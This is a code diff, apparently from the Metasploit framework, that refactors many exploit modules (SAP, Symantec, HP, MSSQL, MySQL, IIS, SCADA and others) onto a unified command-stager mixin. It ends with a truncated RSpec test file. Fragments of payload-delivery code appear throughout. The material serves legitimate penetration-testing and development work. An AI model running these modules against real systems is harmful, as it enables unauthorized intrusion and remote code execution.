exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
execute_cmdstager({ :temp => '.'})
execute_cmdstager({ :temp => '.' })
@payload_exe = payload_exe
print_status("Attempting to execute the payload...")

5
modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb
View File

@ -12,7 +12,7 @@ class Metasploit4 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::CmdStager
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
@ -56,7 +56,8 @@ class Metasploit4 < Msf::Exploit::Remote
[ 'Windows Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
'Platform' => 'win',
'CmdStagerFlavor' => 'vbs'
},
],
],

5
modules/exploits/multi/sap/sap_soap_rfc_sxpg_call_system_exec.rb
View File

@ -26,7 +26,7 @@ class Metasploit4 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::CmdStager
include Msf::Exploit::EXE
include Msf::Exploit::Remote::HttpClient
@ -66,7 +66,8 @@ class Metasploit4 < Msf::Exploit::Remote
[ 'Windows x64',
{
'Arch' => ARCH_X86_64,
'Platform' => 'win'
'Platform' => 'win',
'CmdStagerFlavor' => 'vbs'
}
]
],

5
modules/exploits/multi/sap/sap_soap_rfc_sxpg_command_exec.rb
View File

@ -26,7 +26,7 @@ class Metasploit4 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::CmdStager
include Msf::Exploit::EXE
include Msf::Exploit::Remote::HttpClient
@ -67,7 +67,8 @@ class Metasploit4 < Msf::Exploit::Remote
[ 'Windows x64',
{
'Arch' => ARCH_X86_64,
'Platform' => 'win'
'Platform' => 'win',
'CmdStagerFlavor' => 'vbs'
}
]
],

14
modules/exploits/multi/ssh/sshexec.rb
View File

@ -9,7 +9,7 @@ require 'net/ssh'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::CmdStagerBourne
include Msf::Exploit::CmdStager
attr_accessor :ssh_socket
@ -46,21 +46,22 @@ class Metasploit3 < Msf::Exploit::Remote
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
},
}
],
[ 'Linux x64',
{
'Arch' => ARCH_X86_64,
'Platform' => 'linux'
},
}
],
[ 'OSX x86',
{
'Arch' => ARCH_X86,
'Platform' => 'osx'
},
],
}
]
],
'CmdStagerFlavor' => %w{ bourne echo printf },
'DefaultTarget' => 0,
# For the CVE
'DisclosureDate' => 'Jan 01 1999'
@ -83,6 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def execute_command(cmd, opts = {})
vprint_status("Executing #{cmd}")
begin
Timeout.timeout(3) do
self.ssh_socket.exec!("#{cmd}\n")
@ -125,7 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])
print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending Bourne stager...")
print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending stager...")
execute_cmdstager({:linemax => 500})
end
end

5
modules/exploits/unix/webapp/zeroshell_exec.rb
View File

@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerEcho
include Msf::Exploit::CmdStager
include Msf::Exploit::EXE
def initialize(info={})
@ -47,6 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
OptString.new('TARGETURI', [true, 'The base path to the ZeroShell instance', '/'])
], self.class)
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
end
def uri
@ -149,7 +150,7 @@ class Metasploit3 < Msf::Exploit::Remote
@session = login(admin_password)
execute_cmdstager
execute_cmdstager({:flavor => :echo})
end
end

8
modules/exploits/windows/antivirus/ams_hndlrsvc.rb
View File

@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::CmdStagerTFTP
include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
@ -39,6 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'Privileged' => true,
'Platform' => 'win',
'CmdStagerFlavor' => 'tftp',
'DefaultTarget' => 0,
'DisclosureDate' => 'Jul 26 2010'))
@ -50,11 +51,8 @@ class Metasploit3 < Msf::Exploit::Remote
end
def windows_stager
exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
execute_cmdstager({ :temp => '.'})
execute_cmdstager({ :temp => '.' })
@payload_exe = payload_exe
print_status("Attempting to execute the payload...")

5
modules/exploits/windows/antivirus/ams_xfr.rb
View File

@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::CmdStagerTFTP
include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
@ -38,6 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote
}
]
],
'CmdStagerFlavor' => 'tftp',
'Privileged' => true,
'Platform' => 'win',
'DefaultTarget' => 0,
@ -55,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote
exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
execute_cmdstager({ :temp => '.'})
execute_cmdstager({ :temp => '.' })
@payload_exe = payload_exe
print_status("Attempting to execute the payload...")

5
modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb
View File

@ -10,7 +10,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include REXML
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
@ -52,6 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote
Opt::RPORT(9090),
OptString.new('TARGETURI', [true, 'The base path', '/'])
], self.class)
deregister_options('CMDSTAGER::FLAVOR')
end
def check
@ -71,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
print_status("#{peer} - Sending payload")
# Execute the cmdstager, max length of the commands is ~3950
execute_cmdstager({:linemax => 3950})
execute_cmdstager({:flavor => :vbs, :linemax => 3950})
end
def execute_command(cmd, opts = {})

3
modules/exploits/windows/browser/dxstudio_player_exec.rb
View File

@ -10,7 +10,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
@ -50,6 +50,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'Automatic', { } ],
],
'CmdStagerFlavor' => 'vbs',
'DisclosureDate' => 'Jun 09 2009',
'DefaultTarget' => 0))
end

3
modules/exploits/windows/emc/replication_manager_exec.rb
View File

@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
@ -50,6 +50,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Tested on Windows XP and Windows 2003
[ 'EMC Replication Manager 5.2.1 / Windows Native Payload', { } ]
],
'CmdStagerFlavor' => 'vbs',
'DefaultOptions' =>
{
'WfsDelay' => 5

8
modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb
View File

@ -8,7 +8,7 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::CmdStagerTFTP
include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
@ -38,6 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote
}
]
],
'CmdStagerFlavor' => 'tftp',
'Privileged' => true,
'Platform' => 'win',
'DisclosureDate' => 'Apr 13 2011',
@ -52,11 +53,8 @@ class Metasploit3 < Msf::Exploit::Remote
end
def windows_stager
exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
execute_cmdstager({ :temp => '.'})
execute_cmdstager({ :temp => '.' })
@payload_exe = payload_exe
print_status("Attempting to execute the payload...")

5
modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb
View File

@ -11,7 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
@ -42,6 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Privileged' => true,
'Platform' => 'win',
'Arch' => ARCH_X86,
'CmdStagerFlavor' => 'vbs',
'Targets' =>
[
[ 'HP SiteScope 11.20 (with Operations Agent) / Windows 2003 SP2', {} ]
@ -49,7 +50,7 @@ class Metasploit3 < Msf::Exploit::Remote
'DefaultTarget' => 0,
'DefaultOptions' =>
{
'DECODERSTUB' => File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_noquot")
'CMDSTAGER::DECODER' => File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_noquot")
},
'DisclosureDate' => 'Jul 29 2013'))

8
modules/exploits/windows/http/osb_uname_jlist.rb
View File

@ -8,7 +8,7 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::CmdStagerTFTP
include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
@ -39,6 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
}
]
],
'CmdStagerFlavor' => 'tftp',
'Privileged' => true,
'Platform' => 'win',
'DisclosureDate' => 'Jul 13 2010',
@ -53,11 +54,8 @@ class Metasploit3 < Msf::Exploit::Remote
end
def windows_stager
exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
execute_cmdstager({ :temp => '.'})
execute_cmdstager({ :temp => '.' })
@payload_exe = payload_exe
print_status("Attempting to execute the payload...")

3
modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
View File

@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::CmdStager
include Msf::Exploit::FileDropper
def initialize(info = {})
@ -43,6 +43,7 @@ class Metasploit3 < Msf::Exploit
}
]
],
'CmdStagerFlavor' => 'vbs',
'DefaultTarget' => 0,
'Privileged' => false
))

5
modules/exploits/windows/iis/ms01_026_dbldecode.rb
View File

@ -12,7 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
# NOTE: This cannot be an HttpClient module since the response from the server
# is not a valid HttpResponse
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStagerTFTP
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
@ -38,6 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'Automatic', { } ]
],
'CmdStagerFlavor' => 'tftp',
'DefaultTarget' => 0,
'DisclosureDate' => 'May 15 2001'
))
@ -191,7 +192,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
# Use the CMD stager to get a payload running
execute_cmdstager({ :temp => '.', :linemax => 1400, :cgifname => exe_fname })
execute_cmdstager({:temp => '.', :linemax => 1400, :cgifname => exe_fname})
# Save these file names for later deletion
@exe_cmd_copy = exe_fname

3
modules/exploits/windows/iis/msadc.rb
View File

@ -10,7 +10,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerTFTP
include Msf::Exploit::CmdStager
def initialize
super(
@ -50,6 +50,7 @@ class Metasploit3 < Msf::Exploit::Remote
# w2k w/sp0, IIS5.0, mdac 2.7 RTM, sql2000, handunsf.reg, over xp_cmdshell, reverse_tcp
[ 'Automatic', { } ],
],
'CmdStagerFlavor' => 'tftp',
'DefaultTarget' => 0,
'DisclosureDate' => 'Jul 17 1998'
)

6
modules/exploits/windows/misc/altiris_ds_sqli.rb
View File

@ -7,7 +7,7 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::CmdStagerTFTP
include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote
OptBool.new('DISABLE_SECURITY', [ true, "Exploit SQLi to execute wc_upd_disable_security and disable Console Authentication", false ]),
OptBool.new('ENABLE_SECURITY', [ true, "Enable Local Deployment Console Authentication", false ])
], self.class)
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
end
def execute_command(cmd, opts = {})
@ -159,7 +159,7 @@ Processor-Speed=#{processor_speed}
# CmdStagerVBS was tested here as well, however delivery took roughly
# 30 minutes and required sending almost 350 notification messages.
# size constraint requirement for SQLi is: linemax => 393
execute_cmdstager({ :delay => 1.5, :temp => '%TEMP%\\'})
execute_cmdstager({:delay => 1.5, :temp => '%TEMP%\\', :flavor => :tftp})
end
def on_new_session(client)

10
modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb
View File

@ -13,7 +13,7 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Powershell
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
@ -44,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote
},
'DefaultOptions' =>
{
'DECODERSTUB' => File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_noquot")
'CMDSTAGER::DECODER' => File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_noquot")
},
'Platform' => 'win',
'Targets' =>
@ -59,8 +59,8 @@ class Metasploit3 < Msf::Exploit::Remote
[
Opt::RPORT(5555),
OptString.new('CMDPATH', [true, 'The cmd.exe path', 'c:\\windows\\system32\\cmd.exe'])
],
self.class)
], self.class)
deregister_options('CMDSTAGER::FLAVOR')
end
def check
@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
if target.name =~ /VBScript CMDStager/
# 7500 just in case, to be sure the command fits after
# environment variables expansion
execute_cmdstager({:linemax => 7500})
execute_cmdstager({:flavor => :vbs, :linemax => 7500})
elsif target.name =~ /Powershell/
# Environment variables are not being expanded before, neither in CreateProcess
command = cmd_psh_payload(payload.encoded).gsub(/%COMSPEC% /, "")

3
modules/exploits/windows/mssql/mssql_linkcrawler.rb
View File

@ -12,7 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::MSSQL
include Msf::Auxiliary::Report
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
@ -55,6 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'Automatic', { } ],
],
'CmdStagerFlavor' => 'vbs',
'DefaultTarget' => 0
))

3
modules/exploits/windows/mssql/mssql_payload.rb
View File

@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::MSSQL
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::CmdStager
#include Msf::Exploit::CmdStagerDebugAsm
#include Msf::Exploit::CmdStagerDebugWrite
#include Msf::Exploit::CmdStagerTFTP
@ -58,6 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'Automatic', { } ],
],
'CmdStagerFlavor' => 'vbs',
'DefaultTarget' => 0,
'DisclosureDate' => 'May 30 2000'
))

3
modules/exploits/windows/mssql/mssql_payload_sqli.rb
View File

@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::MSSQL_SQLI
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
@ -83,6 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'Automatic', { } ],
],
'CmdStagerFlavor' => 'vbs',
'DefaultTarget' => 0,
'DisclosureDate' => 'May 30 2000'
))

63
modules/exploits/windows/mysql/mysql_payload.rb
View File

@ -9,43 +9,44 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::MYSQL
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::CmdStager
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Oracle MySQL for Microsoft Windows Payload Execution',
'Description' => %q{
This module creates and enables a custom UDF (user defined function) on the
target host via the SELECT ... into DUMPFILE method of binary injection. On
default Microsoft Windows installations of MySQL (=< 5.5.9), directory write
permissions not enforced, and the MySQL service runs as LocalSystem.
'Name' => 'Oracle MySQL for Microsoft Windows Payload Execution',
'Description' => %q{
This module creates and enables a custom UDF (user defined function) on the
target host via the SELECT ... into DUMPFILE method of binary injection. On
default Microsoft Windows installations of MySQL (=< 5.5.9), directory write
permissions not enforced, and the MySQL service runs as LocalSystem.
NOTE: This module will leave a payload executable on the target system when the
attack is finished, as well as the UDF DLL, and will define or redefine sys_eval()
and sys_exec() functions.
},
'Author' =>
[
'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>', # the lib_mysqludf_sys.dll binaries
'todb' # this Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
# Bernardo's work with cmd exec via udf
[ 'URL', 'http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html' ],
# Advice from 2005 on securing MySQL on Windows, kind of helpful.
[ 'URL', 'http://dev.mysql.com/tech-resources/articles/securing_mysql_windows.html' ]
],
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { } ], # Confirmed on MySQL 4.1.22, 5.5.9, and 5.1.56 (64bit)
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 16 2009' # Date of Bernardo's blog post.
NOTE: This module will leave a payload executable on the target system when the
attack is finished, as well as the UDF DLL, and will define or redefine sys_eval()
and sys_exec() functions.
},
'Author' =>
[
'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>', # the lib_mysqludf_sys.dll binaries
'todb' # this Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
# Bernardo's work with cmd exec via udf
[ 'URL', 'http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html' ],
# Advice from 2005 on securing MySQL on Windows, kind of helpful.
[ 'URL', 'http://dev.mysql.com/tech-resources/articles/securing_mysql_windows.html' ]
],
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { } ], # Confirmed on MySQL 4.1.22, 5.5.9, and 5.1.56 (64bit)
],
'CmdStagerFlavor' => 'vbs',
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 16 2009' # Date of Bernardo's blog post.
))
register_options(
[

3
modules/exploits/windows/oracle/extjob.rb
View File

@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::SMB
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
@ -40,6 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote
# This module has been tested on Oracle 10g Release 1
# where the Oracle Job Scheduler runs as SYSTEM on Windows
'Targets' => [['Automatic',{}]],
'CmdStagerFlavor' => 'vbs',
'Privileged' => true,
'DisclosureDate' => 'Jan 01 2007',
'DefaultTarget' => 0))

3
modules/exploits/windows/scada/abb_wserver_exec.rb
View File

@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
@ -45,6 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'ABB MicroSCADA Pro SYS600 9.3', { } ]
],
'CmdStagerFlavor' => 'vbs',
'DefaultTarget' => 0,
'Privileged' => false,
'DisclosureDate' => 'Apr 05 2013'

14
modules/exploits/windows/winrm/winrm_script_exec.rb
View File

@ -11,7 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::Remote::WinRM
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::CmdStager
def initialize(info = {})
@ -23,7 +23,7 @@ class Metasploit3 < Msf::Exploit::Remote
delivery: Powershell 2.0 and VBS CmdStager.
The module will check if Powershell 2.0 is available, and if so uses
that method. Otherwise it falls back to the VBS Cmdstager which is
that method. Otherwise it falls back to the VBS CmdStager which is
less stealthy.
IMPORTANT: If targeting an x64 system with the Powershell method
@ -41,6 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
'WfsDelay' => 30,
'EXITFUNC' => 'thread',
'InitialAutoRunScript' => 'post/windows/manage/smart_migrate',
'CMDSTAGER::DECODER' => File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64_sleep")
},
'Platform' => 'win',
'Arch' => [ ARCH_X86, ARCH_X86_64 ],
@ -59,12 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote
OptString.new('PASSWORD', [ true, 'A specific password to authenticate with' ]),
], self.class
)
register_advanced_options(
[
OptString.new( 'DECODERSTUB', [ true, 'The VBS base64 file decoder stub to use.',
File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_sleep")]),
], self.class)
deregister_options('CMDSTAGER::FLAVOR')
@compat_mode = false
end
@ -78,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote
return if path.nil?
exec_script(path)
else
execute_cmdstager
execute_cmdstager({:flavor => :vbs})
end
handler
end

698
spec/lib/msf/core/exploit/cmdstager_spec.rb Normal file
View File

@ -0,0 +1,698 @@
require 'spec_helper'
require 'msf/core'
require 'msf/core/exploit/cmdstager'
describe Msf::Exploit::CmdStager do
def create_exploit(info ={})
mod = Msf::Exploit.allocate
mod.extend described_class
mod.send(:initialize, info)
mod
end
describe "#select_cmdstager" do
subject do
create_exploit
end
context "when no flavor" do
it "raises ArgumentError" do
expect { subject.select_cmdstager }.to raise_error(ArgumentError, /Unable to select CMD Stager/)
end
end
context "when correct flavor" do
context "with default decoder" do
let(:flavor) do
:vbs
end
before do
subject.select_cmdstager(:flavor => flavor)
end
it "selects flavor" do
expect(subject.flavor).to eq(flavor)
end
it "selects default decoder" do
expect(subject.decoder).to eq(subject.default_decoder(flavor))
end
end
context "without default decoder" do
let(:flavor) do
:tftp
end
before do
subject.select_cmdstager(:flavor => flavor)
end
it "selects flavor" do
expect(subject.flavor).to eq(flavor)
end
it "hasn't decoder" do
expect(subject.decoder).to be_nil
end
end
context "with incompatible target" do
subject do
create_exploit({
'DefaultTarget' => 0,
'Targets' =>
[
['Linux',
{
'Platform' => 'linux',
'CmdStagerFlavor' => 'tftp'
}
]
]
})
end
let(:flavor) do
:vbs
end
it "raises ArgumentError" do
expect { subject.select_cmdstager(:flavor => flavor) }.to raise_error(ArgumentError, /The CMD Stager '\w+' isn't compatible with the target/)
end
end
end
end
describe "#default_decoder" do
subject do
create_exploit
end
context "when valid flavor as input" do
context "with default decoder" do
let(:flavor) do
:vbs
end
let(:expected_decoder) do
described_class::DECODERS[:vbs]
end
it "returns the decoder path" do
expect(subject.default_decoder(flavor)).to eq(expected_decoder)
end
end
context "without default decoder" do
let(:flavor) do
:bourne
end
it "returns nil" do
expect(subject.default_decoder(flavor)).to be_nil
end
end
end
context "when invalid flavor as input" do
let(:flavor) do
:invalid_flavor
end
it "returns nil" do
expect(subject.default_decoder(flavor)).to be_nil
end
end
context "when nil flavor as input" do
let(:flavor) do
nil
end
it "should be nil" do
expect(subject.default_decoder(flavor)).to be_nil
end
end
end
describe "#module_flavors" do
context "when the module hasn't CmdStagerFlavor info" do
context "neither the target" do
subject do
create_exploit
end
it "returns empty array" do
expect(subject.module_flavors).to eq([])
end
end
context "the target has CmdStagerFlavor info" do
subject do
create_exploit({
'DefaultTarget' => 0,
'Targets' =>
[
['Windows',
{
'CmdStagerFlavor' => 'vbs'
}
]
]
})
end
let(:expected_flavor) do
['vbs']
end
it "returns an array with the target flavor" do
expect(subject.module_flavors).to eq(expected_flavor)
end
end
end
context "when the module has CmdStagerFlavor info" do
context "but the target hasn't CmdStagerFlavor info" do
subject do
create_exploit('CmdStagerFlavor' => 'vbs')
end
let(:expected_flavor) do
['vbs']
end
it "returns an array with the module flavor" do
expect(subject.module_flavors).to eq(expected_flavor)
end
end
context "and the target has CmdStagerFlavor info" do
subject do
create_exploit({
'CmdStagerFlavor' => 'vbs',
'DefaultTarget' => 0,
'Targets' =>
[
['Windows TFTP',
{
'CmdStagerFlavor' => 'tftp'
}
]
]
})
end
let(:expected_flavor) do
['vbs', 'tftp']
end
it "returns an array with all the flavors available to the module" do
expect(subject.module_flavors).to eq(expected_flavor)
end
end
end
end
describe "#target_flavor" do
context "when the module hasn't CmdStagerFlavor info" do
context "neither the target" do
subject do
create_exploit
end
it "returns nil" do
expect(subject.target_flavor).to be_nil
end
end
context "the target has CmdStagerFlavor info" do
subject do
create_exploit({
'DefaultTarget' => 0,
'Targets' =>
[
['Windows',
{
'CmdStagerFlavor' => 'vbs'
}
]
]
})
end
let(:expected_flavor) do
'vbs'
end
it "returns the target flavor" do
expect(subject.target_flavor).to eq(expected_flavor)
end
end
end
context "when the module has CmdStagerFlavor info" do
context "but the target hasn't CmdStagerFlavor info" do
subject do
create_exploit('CmdStagerFlavor' => 'vbs')
end
let(:expected_flavor) do
'vbs'
end
it "returns the module flavor" do
expect(subject.target_flavor).to eq(expected_flavor)
end
end
context "and the target has CmdStagerFlavor info" do
subject do
create_exploit({
'CmdStagerFlavor' => 'vbs',
'DefaultTarget' => 0,
'Targets' =>
[
['Windows TFTP',
{
'CmdStagerFlavor' => 'tftp'
}
]
]
})
end
let(:expected_flavor) do
'tftp'
end
it "returns the target flavor" do
expect(subject.target_flavor).to eq(expected_flavor)
end
end
end
end
describe "#compatible_flavor?" do
context "when there isn't target flavor" do
subject do
create_exploit
end
let(:flavor) do
:vbs
end
it "is compatible" do
expect(subject.compatible_flavor?(flavor)).to be_true
end
end
context "when the target flavor is a string" do
subject do
create_exploit('CmdStagerFlavor' => 'vbs')
end
context "and good flavor" do
let(:flavor) do
:vbs
end
it "is compatible" do
expect(subject.compatible_flavor?(flavor)).to be_true
end
end
context "and bad flavor" do
let(:flavor) do
:tftp
end
it "isn't compatible" do
expect(subject.compatible_flavor?(flavor)).to be_false
end
end
end
context "when the target flavor is a symbol" do
subject do
create_exploit('CmdStagerFlavor' => :vbs)
end
context "and good flavor" do
let(:flavor) do
:vbs
end
it "is compatible" do
expect(subject.compatible_flavor?(flavor)).to be_true
end
end
context "and bad flavor" do
let(:flavor) do
:tftp
end
it "isn't compatible" do
expect(subject.compatible_flavor?(flavor)).to be_false
end
end
end
context "when the target flavor is an Array" do
subject do
create_exploit('CmdStagerFlavor' => ['vbs', :tftp])
end
context "and good flavor" do
let(:flavor) do
:vbs
end
it "is compatible" do
expect(subject.compatible_flavor?(flavor)).to be_true
end
end
context "and bad flavor" do
let(:flavor) do
:echo
end
it "isn't compatible" do
expect(subject.compatible_flavor?(flavor)).to be_false
end
end
end
end
describe "#guess_flavor" do
context "when the module hasn't targets" do
context "neither platforms" do
subject do
create_exploit
end
it "doesn't guess" do
expect(subject.guess_flavor).to be_nil
end
end
context "but platforms" do
context "one platform with default flavor" do
let(:platform) do
'win'
end
let(:expected_flavor) do
:vbs
end
subject do
create_exploit('Platform' => platform)
end
it "guess the platform defulat flavor" do
expect(subject.guess_flavor).to eq(expected_flavor)
end
end
context "one platform without default flavor" do
let (:platform) do
'java'
end
subject do
create_exploit('Platform' => platform)
end
it "doesn't guess" do
expect(subject.guess_flavor).to be_nil
end
end
context "two platforms" do
let(:platform) do
['unix', 'linux']
end
subject do
create_exploit('Platform' => platform)
end
it "doesn't guess" do
expect(subject.guess_flavor).to be_nil
end
end
end
end
context "when the module has one target" do
context "and the target has one platform" do
context "with default flavor"do
let (:expected_flavor) do
:vbs
end
let (:platform) do
'win'
end
subject do
create_exploit({
'DefaultTarget' => 0,
'Targets' =>
[
['Windows',
{
'Platform' => platform
}
]
]
})
end
it "guess the target flavor" do
expect(subject.guess_flavor).to eq(expected_flavor)
end
end
context "without default flavor" do
let (:platform) do
'java'
end
subject do
create_exploit({
'DefaultTarget' => 0,
'Targets' =>
[
['Java',
{
'Platform' => platform
}
]
]
})
end
it "doesn't guess" do
expect(subject.guess_flavor).to be_nil
end
end
end
context "the target has two platforms" do
subject do
create_exploit({
'DefaultTarget' => 0,
'Targets' =>
[
['MultiPlatform',
{
'Platform' => %w{ linux unix}
}
]
]
})
end
it "doesn't guess" do
expect(subject.guess_flavor).to be_nil
end
end
end
end
describe "#select_flavor" do
context "when flavor set in the datastore" do
subject do
create_exploit({
'DefaultOptions' => {
'CMDSTAGER::FLAVOR' => 'vbs'
}
})
end
let(:datastore_flavor) do
:vbs
end
it "returns the datastore flavor" do
expect(subject.select_flavor).to eq(datastore_flavor)
end
context "and flavor set in the opts" do
let(:opts_flavor) do
:bourne
end
it "returns the opts flavor" do
expect(subject.select_flavor(:flavor => :bourne)).to eq(opts_flavor)
end
end
end
end
describe "#select_decoder" do
